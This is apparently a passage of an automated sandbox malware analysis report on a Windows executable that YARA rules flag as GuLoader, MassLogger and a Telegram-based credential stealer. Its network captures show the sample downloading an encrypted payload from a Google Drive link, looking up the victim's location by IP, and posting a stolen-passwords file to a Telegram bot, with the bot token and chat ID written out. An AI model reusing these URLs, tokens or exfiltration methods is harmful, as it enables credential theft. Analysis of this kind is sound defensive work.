                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                    Server: ESF
                                                                                                    Content-Length: 0
                                                                                                    X-XSS-Protection: 0
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.549711172.217.16.1934431476C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-10 23:04:16 UTC258OUTGET /download?id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz&export=download HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Cache-Control: no-cache
                                                                                                    Host: drive.usercontent.google.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-10 23:04:18 UTC4934INHTTP/1.1 200 OK
                                                                                                    X-GUploader-UploadID: AFIdbgSHgMBTHz1GWBLF6RfIVlfYveNXPTRE2ZKpiT0ylF4qRWYSnt0F4XPBwxSV6F3gW8l1R8iEnZw
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Security-Policy: sandbox
                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Content-Disposition: attachment; filename="pzXrb66.bin"
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 94272
                                                                                                    Last-Modified: Sun, 08 Dec 2024 21:18:24 GMT
                                                                                                    Date: Fri, 10 Jan 2025 23:04:18 GMT
                                                                                                    Expires: Fri, 10 Jan 2025 23:04:18 GMT
                                                                                                    Cache-Control: private, max-age=0
                                                                                                    X-Goog-Hash: crc32c=/SG2kQ==
                                                                                                    Server: UploadServer
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close
                                                                                                    2025-01-10 23:04:18 UTC4934INData Raw: df 1f 5d 34 ad a1 cb 5f 5b 3e 43 89 48 32 3a de b7 09 81 dc 9e 82 27 7e e8 71 58 07 fb ce 54 c0 9a 15 92 d6 c5 a2 e8 5b 1f aa 6c 85 fa 97 2e de ff 65 4a 5e 60 e5 d5 3d 4f 41 fa 9f 62 f9 63 8f 06 fd 93 61 6a d9 90 55 2f bb 5f 52 80 e1 d2 ae 12 71 28 9f ad 30 0b ad 9f b1 1b 86 2e 23 38 db f0 e3 44 47 46 45 96 b1 13 08 6e 6c 33 d5 2d 63 63 44 96 71 5a c5 b3 49 e9 cd d9 31 01 fb a2 43 5c d6 1e bb 20 86 ae f8 ba ee 02 78 28 1a 7f fb 8d 0c 33 80 2b fc 14 e2 44 d9 2e 1b 4c 04 60 c2 fa 9c 5a a0 20 88 13 16 b9 a9 6f d2 90 50 1c 25 04 78 c3 61 e1 40 b3 5d 2e cb f0 07 33 51 f4 bf 46 8a 93 33 6f 1d 7f 23 b5 44 96 17 7c 4a bf bf d5 ba fa 5d 4f 83 2c 3a 5e 0e 4f bb 67 05 66 33 8d 61 18 ed 86 86 be 71 e2 5d 36 b3 a8 0b 2a ea 46 d8 14 ea c1 d3 76 82 f4 ce fc 88 90 60 19
                                                                                                    Data Ascii: ]4_[>CH2:'~qXT[l.eJ^`=OAbcajU/_Rq(0.#8DGFEnl3-ccDqZI1C\ x(3+D.L`Z oP%xa@].3QF3o#D|J]O,:^Ogf3aq]6*Fv`
                                                                                                    2025-01-10 23:04:18 UTC4828INData Raw: e7 1c eb 03 dc ea e9 87 36 92 27 e5 8d 7d 99 03 47 f1 c8 7f 57 ee 17 d8 3d 99 03 90 86 81 59 a7 03 65 41 52 90 55 21 bb 81 5e 7f 17 fe a9 a3 1e 29 9f ad 3a 0b 71 01 a2 3e ae 1d 23 38 d1 e3 e7 44 6f 14 45 96 bb ce 1f 6c 6c 33 d5 2d 63 1d 5c 96 71 5e b7 e5 42 e9 bd cf 19 00 fb a2 49 44 37 a5 a6 25 23 a2 0c 80 57 03 34 e5 48 a7 93 e4 75 00 f6 48 95 0d 8e 25 b4 0a 0b a0 6a 0e a7 e1 32 38 c5 0a fa 77 7e f6 4f 01 f2 de 61 6e 05 69 13 c8 94 cf 4d b4 57 1b cd d8 96 33 51 fe cd 66 c4 93 43 0b 2a 7c 23 04 11 de a6 7c 40 97 f8 d5 ba f0 32 3d 83 2e 31 55 1e 19 c9 63 64 67 43 f3 74 18 ed 82 f4 2c 7a 3c a8 1f f4 a8 2b 20 85 d5 78 15 e0 c1 ad 24 82 f4 ea 8f 1c 90 62 13 8e d4 75 e6 53 44 03 30 11 e5 ce 1d 85 d3 dd ac 34 00 b8 8d a7 43 94 5e 63 0e aa 3c 22 0f 66 1d 3d 09
                                                                                                    Data Ascii: 6'}GW=YeARU!^):q>#8DoEll3-c\q^BID7%#W4HuH%j28w~OaniMW3QfC*|#|@2=.1UcdgCt,z<+ x$buSD04C^c<"f=
                                                                                                    2025-01-10 23:04:18 UTC1325INData Raw: e8 e5 ca 19 5a 79 b5 bc 26 3f 3f 67 3e 53 55 9c 77 dd e5 29 b9 33 ea 62 bc d6 64 67 11 e0 7a 88 d1 35 65 0c 9b a4 75 bc 73 ec 67 ef c3 1a f4 5e 69 72 af 70 86 96 c2 0a f7 c1 81 a7 5f 44 2b bc 68 9b 46 8e f5 f9 ff 8e ed 1c cf 04 b3 72 e9 85 47 d9 2e ed 9f 0b 44 6a 28 71 e0 2b 5d ee 14 bd 4d 8a 07 8b 82 d3 46 a5 78 27 69 d9 94 7d f8 bb 5f 58 7f 1e d2 ac d1 3b 28 9f a9 4e 58 ad df bb 33 d2 2e 23 32 d0 f7 f0 41 56 43 69 9b b3 68 42 6e 6c 37 fd fe 63 63 4e 96 71 5a c7 c8 01 e9 cd dd 4f d2 fb a2 49 7a 9d a4 b5 2a 3e af 26 9d 47 05 18 e8 39 50 db e4 7f 17 d8 8a 93 73 9a 25 b4 0e 7a 56 26 0e ad 8a c2 6b c5 00 f0 4e 2c 99 c0 0b ff dd 0c 48 14 6e 3b aa 06 b4 01 be 57 0e e3 23 07 33 5b f4 bf 16 e5 93 33 38 2c 76 23 28 7f e3 a6 59 4a bf ae d5 b8 84 60 af 83 2a 45 6b
                                                                                                    Data Ascii: Zy&??g>SUw)3bdgz5eusg^irp_D+hFrG.Dj(q+]MFx'i}_X;(NX3.#2AVCihBnl7ccNqZOIz*>&G9Ps%zV&kN,Hn;W#3[38,v#(YJ`*Ek
                                                                                                    2025-01-10 23:04:18 UTC1390INData Raw: 80 5d 6e bf 71 4d 7c d9 e0 f7 0e a2 56 3d bb 1e d2 a8 08 54 32 ed eb 25 0b dd 7d 94 00 8f 41 e5 38 db f6 41 61 5b 34 25 83 b1 63 aa 46 cc 33 d5 27 70 67 3a 99 71 5a c1 a2 4d c1 83 d9 31 8b 7b ad 43 52 cd a4 a7 22 1a 7a 35 9b 5c 10 31 f4 3e 06 02 3a 70 01 f2 a7 85 7f 90 25 af 61 79 2d 6a 04 ad 52 bc 13 c7 00 fa 4c 79 89 c0 01 f0 d4 02 4f 7f fe 17 a8 04 cf 4d be 4c 3a c1 f0 4d 30 51 f4 93 16 cf 82 33 50 c5 7c 23 08 75 f9 2b 43 4a bf be f0 ac 88 97 ba 83 5e 99 70 18 6d 5d 72 63 17 91 a8 71 6a ef 90 86 ce d3 19 c1 45 ad be 2b 5a 48 4a 6c 06 ee db 5e a7 82 f4 ef d9 9e ee bc 19 9d d9 16 da 2a d1 73 5f c4 f4 c9 78 b1 f6 ca d8 ea 7e 98 87 d5 aa f1 c9 13 61 7f 2f 2a 7b df 38 25 73 f6 69 9d e0 2d 1f 4c 5f 1a 3f 6d 2d 95 b4 ad cb 41 06 ef da e3 23 bd d0 c1 5e c3 3e
                                                                                                    Data Ascii: ]nqM|V=T2%}A8Aa[4%cF3'pg:qZM1{CR"z5\1>:p%ay-jRLyOML:M0Q3P|#u+CJ^pm]rcqjE+ZHJl^*s_x~a/*{8%si-L_?m-A#^>
                                                                                                    2025-01-10 23:04:19 UTC1390INData Raw: d5 6f 84 be 71 2d d4 26 be 32 38 24 fb 48 0b fb ea c1 d9 25 8d e5 e0 ed 86 e2 32 03 9d a3 0b 0b 3c d1 09 27 cd 9b 26 72 13 d9 ce b6 25 70 ea d9 bd 47 97 e1 2d 0e a0 25 39 60 6c 0c 24 7e d8 69 9d e0 4c e9 4a 4d 05 a1 b2 2d 9f 09 1c fd 49 6b 26 00 f4 ff 42 1e d9 5e b2 42 90 8f 1f 6f 92 b3 b8 80 6a 8e be 59 77 96 e9 2e fc 45 b1 bc 20 64 fd 58 ad c2 83 66 6e 83 5b 76 34 32 d7 9c 83 7e ea 64 37 9e 61 8b 07 de 7a ad 4f 9a 32 bb 0b 17 56 d8 b6 2d 14 a1 ef ab 57 9e 5e 69 d6 dc d3 51 57 23 a7 22 16 d8 18 9b f2 77 0d d6 d9 02 e5 fd a6 8e 80 51 5a 40 ec 38 4b 8d 55 ac b4 8a 71 b6 5c b2 ad 6b 6f 72 8c 4b 0f f0 70 b1 4b dd a3 b9 05 98 33 d5 41 88 95 33 ff 43 9b 88 f8 11 4b 40 fb 04 5a 54 16 12 b9 bc 26 ab 32 73 d5 ef 3a de 1c c9 48 7e 14 41 4f 14 29 5b a1 27 0f 63 0a
                                                                                                    Data Ascii: oq-&28$H%2<'&r%pG-%9`l$~iLJM-Ik&B^BojYw.E dXfn[v42~d7azO2V-W^iQW#"wQZ@8KUq\korKpK3A3CK@ZT&2s:H~AO)['c
                                                                                                    2025-01-10 23:04:19 UTC1390INData Raw: c7 2e a0 ce 66 1f ed c2 93 e1 b2 8f 80 83 44 4b 5b 4c 27 76 62 54 b8 38 43 41 b7 3a 89 ff 7a 73 6b 9a 4c 9f 90 89 b0 4a d1 b5 87 ee 86 22 cb 46 6d 05 16 32 50 9e 93 ee 22 53 4a fa 1f 72 a9 cb 12 b3 94 68 d9 d0 62 c6 89 56 4f e0 c9 38 67 33 78 a3 66 ab 4b 89 ac 60 90 00 ba cf 44 cf 0e 90 20 03 b0 f0 0b 48 e6 37 37 3e 81 96 91 87 22 bd c7 ac 20 ac da d4 78 16 28 89 0c ba 75 81 56 2e 08 55 c9 bc c1 3e 7a 8b 84 5d a4 12 f8 8f 09 dd e8 b8 96 11 c5 c2 96 bc 23 0e 49 69 fe 39 22 8f 26 65 38 e4 1a dd f6 6b 61 77 fc 96 2a 7d e1 58 fa 97 a9 27 2a 96 1a 58 9a 52 15 62 68 a8 1f 5a 7e 39 61 88 15 fa 70 3a 76 6e f1 9e be ca 22 9e 27 af 09 b8 41 20 a8 f3 01 5c af 42 d8 16 f9 f2 59 b1 a0 ea 0f 63 a4 39 40 fc cb 4f d2 e3 c2 d0 d0 fc 3e 1a 80 10 0a 07 23 84 b1 73 2a 4b e7
                                                                                                    Data Ascii: .fDK[L'vbT8CA:zskLJ"Fm2P"SJrhbVO8g3xfK`D H77>" x(uV.U>z]#Ii9"&e8kaw*}X'*XRbhZ~9ap:vn"'A \BYc9@O>#s*K
                                                                                                    2025-01-10 23:04:19 UTC1390INData Raw: e7 fe 6b 1d 76 ed 9e 76 fd e1 49 f0 9b b8 1e ff bb aa 8c ff 63 00 17 09 80 51 5b 52 3e 7a 80 66 c3 88 3a 77 0b fb 99 87 86 23 42 2f 27 13 74 9b 37 74 e8 df a3 ac 5e d8 67 85 27 51 aa b7 cb 11 04 f9 50 5b 20 f4 f3 c1 e5 de c3 d7 d5 2e 0f 96 38 e5 16 24 fc ca 6b f4 1b ad 5c cc 88 22 eb ea 08 c0 5c e9 a9 67 40 9a ba 9a 70 ab 8d 35 c2 90 25 f1 fa 73 c2 d7 2a b0 ef c5 ce 26 02 d5 ee a8 bd 70 01 bc 8d 1a 8a 8a bd 8b 3d a5 41 aa 26 3a c0 a6 3b 7c 89 7c 9b d5 45 c9 79 d6 ea f8 ef e7 68 1c e1 7f 1b 4c cf 8e 81 e1 be dd 57 02 c9 3d d9 1f 17 81 eb ee 61 98 a2 58 0c ea fd fe 5d fe d8 d7 be c7 02 4c bb 71 a1 29 69 89 49 bd da d1 a2 93 0f d6 7e f8 db 0c 36 4c 90 3e e3 0b bf e6 26 c5 9f 1d 16 b0 fc a9 cc 8a 35 76 ec 13 13 68 3e b1 e3 21 05 93 6e 66 8f 23 a6 37 9e cd 44
                                                                                                    Data Ascii: kvvIcQ[R>zf:w#B/'t7t^g'QP[ .8$k\"\g@p5%s*&p=A&:;||EyhLW=aX]Lq)iI~6L>&5vh>!nf#7D
                                                                                                    2025-01-10 23:04:19 UTC1390INData Raw: 4d da 97 98 fa a0 0f 15 17 ea 2f d3 33 0b c6 45 ef 61 98 dc 58 62 b5 f7 d6 c3 ef d1 f9 38 ce 13 43 bc 8a a0 3a 63 b3 63 ab 0c 7a b1 98 14 d5 43 e9 81 3a 2a 4c ea 40 33 64 e0 e0 49 90 8e 14 34 0d 40 a9 ca 9f 23 73 ec 02 3c 3a dc 9c 49 51 13 b1 e7 77 88 5b 2c d5 9d ac 2e 1a 22 20 d8 15 b5 2c d7 27 0b 84 1f 8b 95 1d 33 85 f8 b9 be 69 d5 9c 83 02 22 89 c7 71 38 87 ea 28 1a e9 2b 41 71 6c 0d 2c 78 fe 12 af 2b 2a f1 dd ea 57 5f 36 e1 08 d5 81 c5 aa ef 79 64 0d 58 f0 ef 46 52 2f ba 14 b6 40 57 0a c9 c9 2c 0f 80 de e5 22 2b 53 a6 db ef e6 d2 f5 d3 82 da fe 68 51 83 85 77 36 2c 90 c4 d6 0a 26 02 d3 6f fe e8 90 c4 2b 94 e6 52 17 d8 7f 05 2b b1 74 14 3c 8f 54 d2 f7 66 24 f7 58 e3 ec 07 3b e4 5d 25 0c 28 74 b1 a0 1e 3d 49 7a 02 38 10 f8 5b 96 14 57 ef ae 00 c7 09 7f
                                                                                                    Data Ascii: M/3EaXb8C:cczC:*L@3dI4@#s<:IQw[,." ,'3i"q8(+Aql,x+*W_6ydXFR/@W,"+ShQw6,&o+R+t<Tf$X;]%(t=Iz8[W
                                                                                                    2025-01-10 23:04:19 UTC1390INData Raw: 33 be 00 6a 96 86 c6 07 32 48 b4 87 c9 a3 b3 bf d7 8e 86 11 50 c7 ad 80 d5 12 15 f4 98 10 1e 56 d0 59 ea e9 e1 38 f2 3e 98 c5 47 17 ac cc 2d 1a ee 70 b6 13 15 29 94 e2 62 54 55 6c ff ea d4 8a c6 50 50 d6 0c 4a 21 fc c9 62 49 7a d6 3b 38 ae 67 96 14 59 ed ad 28 a1 5b 7f a3 33 d1 10 db 7c 55 f6 4b 8c 48 db 27 43 7a 3b 8e 6b 2f c9 d5 08 83 7a d8 eb f7 07 a4 18 c3 6f 07 02 0b a4 4f 0b aa ae b8 c7 0f 93 73 73 73 e8 d1 4a f0 c3 e2 61 1a 90 d9 1b 44 6d e2 45 7b a9 c8 6a 1f e3 88 cd 1d e7 8b 6d 17 83 f1 58 34 2c 3d 85 10 7b 18 75 23 53 52 41 4c 9b d2 2f 80 a2 41 d2 d2 2a 35 f4 e3 e1 4b 11 01 db c4 60 60 a8 fa e9 67 10 6d 4a 04 73 cd 6f 69 f6 37 84 63 31 7c 38 4c 65 4f ae 54 5a 0a 91 69 0f 64 9c b1 55 5c 33 97 01 57 42 ee a8 61 dc 80 eb 99 b3 1c f3 56 38 c5 81 d1
                                                                                                    Data Ascii: 3j2HPVY8>G-p)bTUlPPJ!bIz;8gY([3|UKH'Cz;k/zoOsssJaDmE{jmX4,={u#SRAL/A*5K``gmJsoi7c1|8LeOTZidU\3WBaV8
                                                                                                    2025-01-10 23:04:19 UTC1390INData Raw: 8d 2f 24 35 06 7c aa 10 7b 09 75 3c 4f 69 99 4c 9b 8f 5c b3 81 2b a3 fa 64 25 f4 e9 eb 0f 17 29 22 df 50 6e a3 81 d1 21 11 5e 4a 02 11 1a 70 75 d8 e3 8c 11 61 12 a1 19 0a ed 86 1a 5c 2c 93 0c dc 62 b4 4f 42 86 2a 9a 10 7d 03 d7 bf 60 da f3 34 88 b4 68 97 42 4a ef f2 04 80 84 a8 69 fb 9d 61 57 d7 78 bc 64 e8 31 82 6e 07 48 a2 58 1d f4 6b 1b 85 2c 31 2f 02 61 35 00 9e d1 63 47 52 b7 4b bf 89 c6 2d 28 2c a3 95 a5 c8 72 a8 b3 af 28 4a 64 60 4c cb 4c 8a 05 c9 7a 29 b9 31 fb 1c e6 d3 4c f0 39 32 7c 9b d3 24 6f 25 56 cb 20 f2 72 ec 69 82 c5 60 b9 54 06 73 86 a1 8c be 5c 77 bb c7 92 aa 4e 4d 15 42 69 88 5f af fd ef 9b 8f fe 17 fa 0f 9f 75 c1 2d 3c 9f 24 fc 9e 1a 48 6a 28 71 d9 76 75 7b 1e b7 4d 8a 06 9a 86 ff 60 87 03 49 c3 d9 90 5f 23 aa 58 20 e3 02 d2 de c5 a4
                                                                                                    Data Ascii: /$5|{u<OiL\+d%)"Pn!^Jpua\,bOB*}`4hBJiaWxd1nHXk,1/a5cGRK-(,r(Jd`LLz)1L92|$o%V ri`Ts\wNMBi_u-<$Hj(qvu{M`I_#X


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.549749104.21.16.14431476C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-10 23:04:21 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                    Host: reallyfreegeoip.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-10 23:04:21 UTC855INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 10 Jan 2025 23:04:21 GMT
                                                                                                    Content-Type: text/xml
                                                                                                    Content-Length: 362
                                                                                                    Connection: close
                                                                                                    Age: 1865050
                                                                                                    Cache-Control: max-age=31536000
                                                                                                    cf-cache-status: HIT
                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RwMAZ%2FNsZ45YSQeDE5oCU1hajkTwdnU5P3PfNmWzUsIEIEGemPjk4XjfMoX2hYWy4fHmX4b8vVRYbwfP18%2F460bk9fCd8BMBBZ71scVPQdeDXi8PLadSs%2FHNqnq6y2kV6Hb6o8vS"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 90004e3e888841ba-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1724&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1641371&cwnd=192&unsent_bytes=0&cid=ad50d3d4ea9cc605&ts=147&x=0"
                                                                                                    2025-01-10 23:04:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.549784149.154.167.2204431476C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-10 23:04:27 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary================8dd31a138391b77
                                                                                                    Host: api.telegram.org
                                                                                                    Content-Length: 1090
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-10 23:04:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 31 33 38 33 39 31 62 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                    Data Ascii: --===============8dd31a138391b77Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                    2025-01-10 23:04:28 UTC388INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Fri, 10 Jan 2025 23:04:28 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 543
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2025-01-10 23:04:28 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 35 30 32 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43692,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736550268,"document":{"file_n


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:18:03:58
                                                                                                    Start date:10/01/2025
                                                                                                    Path:C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\WGi85dsMNp.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:979'348 bytes
                                                                                                    MD5 hash:2275024102505F0997F027C71970750D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2180305657.0000000003349000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:18:04:09
                                                                                                    Start date:10/01/2025
                                                                                                    Path:C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\WGi85dsMNp.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:979'348 bytes
                                                                                                    MD5 hash:2275024102505F0997F027C71970750D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:20.3%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:20.1%
                                                                                                      Total number of Nodes:1592
                                                                                                      Total number of Limit Nodes:38
